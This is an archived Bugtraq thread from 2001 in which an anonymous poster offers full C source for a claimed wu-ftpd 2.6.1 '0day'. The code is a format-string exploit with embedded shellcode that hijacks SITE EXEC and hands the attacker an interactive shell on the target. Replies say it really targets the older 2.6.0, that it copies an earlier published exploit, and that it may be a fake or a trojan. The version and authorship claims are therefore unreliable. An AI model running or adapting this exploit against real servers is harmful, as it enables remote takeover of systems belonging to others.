6185791 2001-03-07 04:40 +0100 /283 rader/ Nomen Nescio <nobody@DIZUM.COM> Sänt av: joel@lysator.liu.se Importerad: 2001-03-07 21:56 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: nobody@DIZUM.COM Mottagare: Bugtraq (import) <15805> Ärende: wu-ftpd ------------------------------------------------------------ From: Nomen Nescio <nobody@DIZUM.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <e01141c29072cd2bc40439162ba87800@dizum.com> hi, this is an exploit for wu-ftpd 2.6.1(1) on linux propz to segv for giving this to me bringin' you the 0day from the hackweiser crew, australian +chapter cya, Till ---- /* * Linux wu-ftpd - 2.6.1(1) * * DiGiT */ #include <sys/socket.h> #include <sys/types.h> #include <stdio.h> #include <netinet/in.h> #include <netdb.h> char linuxcode[] = "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb" "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31" "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27" "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31" "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d" "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46" "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8" "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff" "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31"; main (int argc, char *argv[]) { char cmdbuf[8192]; char cbuf[1024]; char *t; char nop[400]; int pip, i, a = 22, st = 0; struct sockaddr_in sck; struct hostent *hp; long inet; int port = 21; fd_set fds; unsigned int aa; long reta, retb, tmp, retz; int ret; int add = 0; memset (cmdbuf, 0x0, sizeof (cmdbuf)); memset (cbuf, 0x0, sizeof (cbuf)); memset (nop, 0x0, sizeof (nop)); if (argc < 2) { fprintf (stderr, "Usage: %s [ip] \n", argv[0]); exit (-1); } pip = socket (PF_INET, SOCK_STREAM, 0); if (!pip) { perror ("socket()"); exit (-1); } inet = inet_addr (argv[1]); if (inet == -1) { if (hp = gethostbyname (argv[1])) memcpy (&inet, hp->h_addr, 4); else inet = -1; if (inet == -1) { fprintf (stderr, "Cant resolv %s!! \n", argv[1]); exit (-1); } } sck.sin_family = PF_INET; sck.sin_port = htons (port); sck.sin_addr.s_addr = inet; if (connect (pip, (struct sockaddr *) &sck, sizeof (sck)) < 0) { perror ("Connect() "); exit (-1); } read (pip, cbuf, 1023); fprintf (stderr, "Connected to: %s \n", argv[1]); fprintf (stderr, "Banner: %s \n", cbuf); strcpy (cmdbuf, "user ftp\n"); write (pip, cmdbuf, strlen (cmdbuf)); memset (nop, 0x90, sizeof (nop) - strlen (linuxcode) - 10); strcat (nop, linuxcode); memset (cmdbuf, 0x0, sizeof (cmdbuf)); sprintf (cmdbuf, "pass %s\n", nop); write (pip, cmdbuf, strlen (cmdbuf)); sleep (1); read (pip, cmdbuf, sizeof (cmdbuf) - 1); memset (cmdbuf, 0x0, sizeof (cmdbuf)); if (!strncmp (cmdbuf, "530", 3)) { printf ("loggin incorrect : %s \n", cmdbuf); exit (-1); } fprintf (stderr, "Logged in.. \n"); fprintf (stderr, "+ Finding ret addresses \n"); memset (cmdbuf, 0x0, sizeof (cmdbuf)); strcpy (cmdbuf, "SITE EXEC %x %x %x %x +%x |%x\n"); write (pip, cmdbuf, strlen (cmdbuf)); sleep (1); memset (cmdbuf, 0x0, sizeof (cmdbuf)); read (pip, cmdbuf, sizeof (cmdbuf) - 1); if (!strncmp (cmdbuf + 4, "%x", 2)) { fprintf (stderr, "[1m[31mWuftpd is not vulnerable : %s \n[0m", cmdbuf); exit (-1); } else { fprintf (stderr, "[1m[32mWuftpd is vulnerable : %s \n[0m", cmdbuf); } reta = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") + 11, 16); retz = strtoul (strstr (cmdbuf, "+") + 1, strstr (cmdbuf, "|") + 11, 16); memset (cmdbuf, 0x0, sizeof (cmdbuf)); strcpy (cmdbuf, "SITE EXEC "); for (ret = 0; ret <= 88; ret++) { strcat (cmdbuf, "%x"); } strcat (cmdbuf, "|%x\n"); write (pip, cmdbuf, strlen (cmdbuf)); sleep (1); memset (cmdbuf, 0x0, sizeof (cmdbuf)); read (pip, cmdbuf, sizeof (cmdbuf) - 1); retb = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") + 11, 16); printf ("Ret location befor: %x \n", reta); if (reta == 0) reta = retz; else add = 600; reta = reta - 0x58; retb = retb + 100 - 0x2569 - add; printf ("Ret location : %x \n", reta); printf ("Proctitle addres : %x and %u \n", retb, retb); sleep (2); memset (cmdbuf, 0x0, sizeof (cmdbuf)); sprintf (cmdbuf, "SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c", (reta & 0x000000ff), (reta & 0x0000ff00) >> 8, (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24); a = 22; memset (cbuf, 0x0, sizeof (cbuf)); while (1) { memset (cmdbuf, 0x0, sizeof (cmdbuf)); sprintf (cmdbuf, "SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c", (reta & 0x000000ff), (reta & 0x0000ff00) >> 8, (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24); for (i = 0; i <= 128; i++) strcat (cmdbuf, "%.f"); for (i = 0; i <= a; i++) strcat (cmdbuf, "%d"); sprintf (cbuf, "|%%x|%%x\n", aa + 9807 - 460); strcat (cmdbuf, cbuf); write (pip, cmdbuf, strlen (cmdbuf)); memset (cmdbuf, 0x0, sizeof (cmdbuf)); read (pip, cmdbuf, sizeof (cmdbuf) - 1); t = (char *) strstr (cmdbuf, "|"); tmp = strtoul (t + 1, t + 11, 16); if (tmp != 0) { fprintf (stderr, "tmp 1 : 0x%x\n", tmp); if (tmp == reta) { fprintf (stderr, "Cached a : %d \n", a); st = 1; break; } tmp = strtoul (t + 11, t + 22, 16); fprintf (stderr, "tmp 2 : 0x%x\n", tmp); if (tmp == reta) { fprintf (stderr, "Cached a : %d \n", a); st = 2; break; } } if (st > 0) break; a++; } sleep (1); memset (cmdbuf, 0x0, sizeof (cmdbuf)); memset (cbuf, 0x0, sizeof (cbuf)); sprintf (cmdbuf, "SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c", (reta & 0x000000ff), (reta & 0x0000ff00) >> 8, (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24); for (i = 0; i <= 128; i++) strcat (cmdbuf, "%.f"); if (add != 600) a = a - 1; fprintf (stderr, "Trying with : %d \n", a); for (i = 0; i <= a; i++) strcat (cmdbuf, "%d"); aa = retb; if (add == 600) sprintf (cbuf, "|%%.%ud%%n\n", aa + 9807); else sprintf (cbuf, "|%%.%ud%%n\n", aa + 9807 - 480); strcat (cmdbuf, cbuf); write (pip, cmdbuf, strlen (cmdbuf)); memset (cmdbuf, 0x0, sizeof (cmdbuf)); read (pip, cmdbuf, sizeof (cmdbuf) - 1); memset (cmdbuf, 0x0, sizeof (cmdbuf)); fprintf (stderr, "[1m[33m Wait for a shell.....\n[0m"); while (1) { FD_ZERO (&fds); FD_SET (0, &fds); FD_SET (pip, &fds); select (255, &fds, NULL, NULL, NULL); if (FD_ISSET (pip, &fds)) { memset (cbuf, 0x0, sizeof (cbuf)); ret = read (pip, cbuf, sizeof (cbuf) - 1); if (ret <= 0) { printf ("Connection closed - EOF \n"); exit (-1); } printf ("%s", cbuf); } if (FD_ISSET (0, &fds)) { memset (cbuf, 0x0, sizeof (cbuf)); read (0, cbuf, sizeof (cbuf) - 1); write (pip, cbuf, strlen (cbuf)); } } close (pip); } _______________________________ The Proton <proton@dshs.nsw.edu.au> _______________________________ (6185791) ------------------------------------------ Kommentar i text 6186637 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL> Kommentar i text 6186670 av predator <preedator@SENDMAIL.RU> 6186670 2001-03-07 22:56 +0100 /32 rader/ predator <preedator@SENDMAIL.RU> Sänt av: joel@lysator.liu.se Importerad: 2001-03-08 02:35 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: preedator@SENDMAIL.RU Mottagare: Bugtraq (import) <15811> Kommentar till text 6185791 av Nomen Nescio <nobody@DIZUM.COM> Ärende: wu-ftpd ------------------------------------------------------------ From: predator <preedator@SENDMAIL.RU> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <3AA6AE9B.A410DE70@sendmail.ru> Nomen Nescio wrote: > > hi, > > this is an exploit for wu-ftpd 2.6.1(1) on linux > propz to segv for giving this to me > > bringin' you the 0day from the hackweiser crew, australian > +chapter > > cya, > Till > > ---- > > /* > * Linux wu-ftpd - 2.6.1(1) > * > * DiGiT > */ Correct me if I'm wrong,but this is exploit for wu 2.6.0 not 2.6.1...This format string bug has been fixed in 2.6.1. -- signoff predator (6186670) ------------------------------------------ 6186831 2001-03-07 22:55 +0100 /27 rader/ Jogchem de Groot <c.dgroot@CHELLO.NL> Sänt av: joel@lysator.liu.se Importerad: 2001-03-08 08:03 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: c.dgroot@CHELLO.NL Mottagare: Bugtraq (import) <15815> Ärende: Re: wu2.6.1 exploit ------------------------------------------------------------ From: Jogchem de Groot <c.dgroot@CHELLO.NL> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <01030722554001.00974@kryptology> jogchem@kryptology:~$ diff wu2.6.1.c wu-lnx.c jogchem@kryptology:~$ Exactly the same as the previously release wu-lnx.c exploit. http://packetstorm.securify.com/0009-exploits/wu-lnx.c kinda a hoax?? :) On Wednesday 07 March 2001 04:40, you wrote: > hi, > > this is an exploit for wu-ftpd 2.6.1(1) on linux > propz to segv for giving this to me > > bringin' you the 0day from the hackweiser crew, australian > +chapter > > cya, > Till ------------------------------------------------------- (6186831) ------------------------------------------ 6190826 2001-03-07 23:42 -0500 /58 rader/ John <johns@TAMPABAY.RR.COM> Sänt av: joel@lysator.liu.se Importerad: 2001-03-08 20:05 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: johns@TAMPABAY.RR.COM Mottagare: Bugtraq (import) <15821> Kommentar till text 6185791 av Nomen Nescio <nobody@DIZUM.COM> Ärende: Re: Wu 2.6.1 exploit ------------------------------------------------------------ From: John <johns@TAMPABAY.RR.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <3AA70DC8.82BF9B1A@tampabay.rr.com> I just posted another messages to Bugtraq before I read a post to Anti Security from DiGiT. His comments are below. digit 07.03.01 22:32:22 Subject: wu-ftpd fake on BUGTRAQ Action: REPLY, NEW. Before everyone starts flaming me or antisec about that post to BUGTRAQ about wu-ftpd 2.6.1 you must realize that I did not write that "exploit" which is on bugtraq. In fact anyone who closely inspects the "exploit" will see that it is actually a fake exploit. However I cant say for sure wether it is a trojan. This might be an attempt to undermine my credibility with antisec? If so, it would be an extremely cheap shot. Nomen Nescio wrote: > > hi, > > this is an exploit for wu-ftpd 2.6.1(1) on linux > propz to segv for giving this to me > > bringin' you the 0day from the hackweiser crew, australian > +chapter > > cya, > Till > > ---- > > /* > * Linux wu-ftpd - 2.6.1(1) > * > * DiGiT > */ > > _______________________________ > The Proton > <proton@dshs.nsw.edu.au> > _______________________________ -- The events which transpired five thousand years ago; Five years ago or five minutes ago, have determined what will happen five minutes from now; five years From now or five thousand years from now. All history is a current event." - Dr John Henrik Clake - (6190826) --------------------------------(Ombruten)